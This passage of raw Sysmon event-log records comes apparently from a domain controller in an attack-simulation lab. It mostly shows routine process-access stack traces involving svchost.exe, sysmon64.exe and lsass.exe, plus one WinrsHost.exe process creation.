indows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004726Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004725Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004724Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004723Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004722Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004721Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004720Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004719Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004718Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CD8-5FA1-EE00-000000008801}4912C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004717Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CD8-5FA1-EE00-000000008801}4912C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004716Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.249{D28789B6-7CD8-5FA1-EE00-000000008801}4912C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000004715Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004714Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004713Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.242{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004712Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.149{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004711Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.149{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004710Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.133{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004709Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.133{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004708Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.133{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004707Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.133{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004706Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.008{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CD8-5FA1-ED00-000000008801}4532C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004705Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.008{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004704Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.008{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004703Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.008{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004702Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:56.008{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 